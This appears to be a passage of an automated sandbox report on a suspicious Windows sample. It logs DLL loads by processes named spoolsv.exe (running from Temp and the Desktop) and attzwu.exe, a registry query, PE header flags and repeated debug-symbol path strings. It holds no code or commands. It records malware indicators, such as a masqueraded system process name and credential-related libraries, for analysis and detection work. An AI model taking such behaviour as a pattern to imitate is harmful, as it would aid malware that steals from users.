                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: dwrite.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: msvcp140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: rstrtmgr.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\spoolsv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\spoolsv.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: spoolsv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: spoolsv.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: attzwu.exe, 0000001B.00000002.2707260922.00000000016FD000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: rC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: qC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: pC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: zC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: lC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: jC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: oC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: |C:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: }C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: iC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: {C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb! source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
